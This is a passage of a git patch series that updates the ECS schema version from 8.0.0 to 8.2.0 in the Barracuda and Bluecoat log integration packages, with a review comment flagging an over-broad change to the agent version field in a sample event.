@@ -26,7 +26,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417889122Z" @@ -38,7 +38,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417890097Z" @@ -50,7 +50,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417891067Z" @@ -62,7 +62,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417891979Z" @@ -74,7 +74,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417892883Z" @@ -86,7 +86,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417893807Z" @@ -98,7 +98,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417894740Z" @@ -110,7 +110,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417895641Z" @@ -122,7 +122,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417896546Z" @@ -134,7 +134,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417897693Z" @@ -146,7 +146,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417898673Z" @@ -158,7 +158,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417899677Z" @@ -170,7 +170,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417900601Z" @@ -182,7 +182,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417901525Z" 
@@ -194,7 +194,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417902606Z" @@ -206,7 +206,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417903535Z" @@ -218,7 +218,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417904455Z" @@ -230,7 +230,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417905395Z" @@ -242,7 +242,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417906312Z" @@ -254,7 +254,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417907225Z" @@ -266,7 +266,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417908129Z" @@ -278,7 +278,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417909320Z" @@ -290,7 +290,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417910284Z" @@ -302,7 +302,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417911221Z" @@ -314,7 +314,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417912116Z" @@ -326,7 +326,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417913011Z" @@ -338,7 +338,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417913918Z" @@ -350,7 +350,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417914898Z" 
@@ -362,7 +362,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417915807Z" @@ -374,7 +374,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417916724Z" @@ -386,7 +386,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417917630Z" @@ -398,7 +398,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417918595Z" @@ -410,7 +410,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417919656Z" @@ -422,7 +422,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417920572Z" @@ -434,7 +434,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417921507Z" @@ -446,7 +446,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417922412Z" @@ -458,7 +458,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417923313Z" @@ -470,7 +470,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417924223Z" @@ -482,7 +482,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417925124Z" @@ -494,7 +494,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417926024Z" @@ -506,7 +506,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417926929Z" @@ -518,7 +518,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417927859Z" 
@@ -530,7 +530,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417928768Z" @@ -542,7 +542,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417929668Z" @@ -554,7 +554,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417930593Z" @@ -566,7 +566,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417931502Z" @@ -578,7 +578,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417932414Z" @@ -590,7 +590,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417933332Z" @@ -602,7 +602,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417934450Z" @@ -614,7 +614,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417935408Z" @@ -626,7 +626,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417936325Z" @@ -638,7 +638,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417937315Z" @@ -650,7 +650,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417938223Z" @@ -662,7 +662,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417939127Z" @@ -674,7 +674,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417940042Z" @@ -686,7 +686,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417940940Z" 
@@ -698,7 +698,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417941858Z" @@ -710,7 +710,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417942773Z" @@ -722,7 +722,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417943672Z" @@ -734,7 +734,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417944596Z" @@ -746,7 +746,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417945487Z" @@ -758,7 +758,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417946428Z" @@ -770,7 +770,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417947361Z" @@ -782,7 +782,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417948270Z" @@ -794,7 +794,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417949183Z" @@ -806,7 +806,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417950084Z" @@ -818,7 +818,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417950998Z" @@ -830,7 +830,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417951917Z" @@ -842,7 +842,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417952819Z" @@ -854,7 +854,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417953730Z" 
@@ -866,7 +866,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417954629Z" @@ -878,7 +878,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417955534Z" @@ -890,7 +890,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417956683Z" @@ -902,7 +902,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417957611Z" @@ -914,7 +914,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417958612Z" @@ -926,7 +926,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417959543Z" @@ -938,7 +938,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417960449Z" @@ -950,7 +950,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417961358Z" @@ -962,7 +962,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417962267Z" @@ -974,7 +974,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417963173Z" @@ -986,7 +986,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417964108Z" @@ -998,7 +998,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418011880Z" @@ -1010,7 +1010,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418014582Z" @@ -1022,7 +1022,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418015832Z" 
@@ -1034,7 +1034,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418016924Z" @@ -1046,7 +1046,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418017868Z" @@ -1058,7 +1058,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418018819Z" @@ -1070,7 +1070,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418019742Z" @@ -1082,7 +1082,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418020760Z" @@ -1094,7 +1094,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418021692Z" @@ -1106,7 +1106,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418022643Z" @@ -1118,7 +1118,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418023569Z" @@ -1130,7 +1130,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418024577Z" @@ -1142,7 +1142,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418025514Z" @@ -1154,7 +1154,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418026469Z" @@ -1166,7 +1166,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418027479Z" @@ -1178,7 +1178,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418028418Z" @@ -1190,7 +1190,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418029350Z" 
diff --git a/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml b/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml index ce3b0184ae7..198cbbc750f 100644 --- a/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml +++ b/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # User agent - user_agent: field: user_agent.original diff --git a/packages/barracuda/data_stream/waf/sample_event.json b/packages/barracuda/data_stream/waf/sample_event.json index 79ce22ce855..f4cbf73f8f6 100644 --- a/packages/barracuda/data_stream/waf/sample_event.json +++ b/packages/barracuda/data_stream/waf/sample_event.json @@ -13,12 +13,12 @@ "type": "logs" }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", "snapshot": true, - "version": "8.0.0" + "version": "8.2.0" }, "event": { "agent_id_status": "verified", diff --git a/packages/barracuda/manifest.yml b/packages/barracuda/manifest.yml index ff5df0d02b6..cd02944de3d 100644 --- a/packages/barracuda/manifest.yml +++ b/packages/barracuda/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: barracuda title: Barracuda Logs -version: 0.8.0 +version: 0.9.0 description: Collect spam and web application firewall logs from Barracuda devices with Elastic Agent. categories: ["network", "security"] release: experimental From cc7c89b6eeb0bf166ca7b296feb29a956150405a Mon Sep 17 00:00:00 2001 
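Review bot: In `packages/barracuda/data_stream/waf/sample_event.json` the hunk rewrites `elastic_agent.version` from `8.0.0` to `8.2.0` as well as `ecs.version`. That field presumably records the Elastic Agent build that captured the sample rather than the ECS schema version, so this looks like an over-broad search-and-replace. The bluecoat and 1password `sample_event.json` hunks in this series change only the `ecs` object. I would keep `"version": "8.0.0"` under `elastic_agent` and change only `"ecs": { "version": "8.2.0" }`, or regenerate the sample from a real run so the agent fields stay mutually consistent. Whether other agent version fields in the file still read `8.0.0` cannot be seen from this hunk.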
From: Taylor Swanson Date: Tue, 22 Feb 2022 13:21:27 -0600 Subject: [PATCH 08/23] Update bluecoat to ECS 8.2 --- packages/bluecoat/_dev/build/build.yml | 2 +- packages/bluecoat/changelog.yml | 5 + .../pipeline/test-generated.log-expected.json | 200 +++++++++--------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/director/sample_event.json | 2 +- packages/bluecoat/manifest.yml | 2 +- 6 files changed, 109 insertions(+), 104 deletions(-) diff --git a/packages/bluecoat/_dev/build/build.yml b/packages/bluecoat/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/bluecoat/_dev/build/build.yml +++ b/packages/bluecoat/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/bluecoat/changelog.yml b/packages/bluecoat/changelog.yml index 06c2468cd78..3f2ca444b74 100644 --- a/packages/bluecoat/changelog.yml +++ b/packages/bluecoat/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.8.0" + changes: + - description: Update to ECS 8.2.0 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "0.7.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json index 88b437011b0..bd21cd730d3 100644 --- a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728249781Z" @@ -14,7 +14,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728256159Z" 
@@ -26,7 +26,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728257323Z" @@ -38,7 +38,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728258427Z" @@ -50,7 +50,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728259453Z" @@ -62,7 +62,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728260480Z" @@ -74,7 +74,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728261505Z" @@ -86,7 +86,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728262584Z" @@ -98,7 +98,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728263621Z" @@ -110,7 +110,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728264636Z" @@ -122,7 +122,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728265649Z" @@ -134,7 +134,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728266832Z" @@ -146,7 +146,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728267854Z" @@ -158,7 +158,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728268868Z" @@ -170,7 +170,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728269879Z" @@ -182,7 +182,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728270901Z" 
@@ -194,7 +194,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728272036Z" @@ -206,7 +206,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728273053Z" @@ -218,7 +218,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728274069Z" @@ -230,7 +230,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728275081Z" @@ -242,7 +242,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728276095Z" @@ -254,7 +254,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728277109Z" @@ -266,7 +266,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728278125Z" @@ -278,7 +278,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728279251Z" @@ -290,7 +290,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728280270Z" @@ -302,7 +302,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728281301Z" @@ -314,7 +314,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728282378Z" @@ -326,7 +326,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728283393Z" @@ -338,7 +338,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728284404Z" @@ -350,7 +350,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728285417Z" 
@@ -362,7 +362,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728286428Z" @@ -374,7 +374,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728287441Z" @@ -386,7 +386,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728288449Z" @@ -398,7 +398,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728289465Z" @@ -410,7 +410,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728290614Z" @@ -422,7 +422,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728291646Z" @@ -434,7 +434,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728292656Z" @@ -446,7 +446,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728293669Z" @@ -458,7 +458,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728294680Z" @@ -470,7 +470,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728295695Z" @@ -482,7 +482,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728296707Z" @@ -494,7 +494,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728297720Z" @@ -506,7 +506,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728298730Z" @@ -518,7 +518,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728299740Z" 
@@ -530,7 +530,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728300759Z" @@ -542,7 +542,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728301773Z" @@ -554,7 +554,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728302854Z" @@ -566,7 +566,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728303864Z" @@ -578,7 +578,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728304874Z" @@ -590,7 +590,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728305882Z" @@ -602,7 +602,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728306991Z" @@ -614,7 +614,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728308006Z" @@ -626,7 +626,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728309020Z" @@ -638,7 +638,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728310051Z" @@ -650,7 +650,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728311079Z" @@ -662,7 +662,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728312091Z" @@ -674,7 +674,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728313111Z" @@ -686,7 +686,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728314122Z" 
@@ -698,7 +698,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728315142Z" @@ -710,7 +710,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728316161Z" @@ -722,7 +722,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728317174Z" @@ -734,7 +734,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728318190Z" @@ -746,7 +746,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728319199Z" @@ -758,7 +758,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728320212Z" @@ -770,7 +770,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728321243Z" @@ -782,7 +782,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728322250Z" @@ -794,7 +794,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728323319Z" @@ -806,7 +806,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728324333Z" @@ -818,7 +818,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728325347Z" @@ -830,7 +830,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, 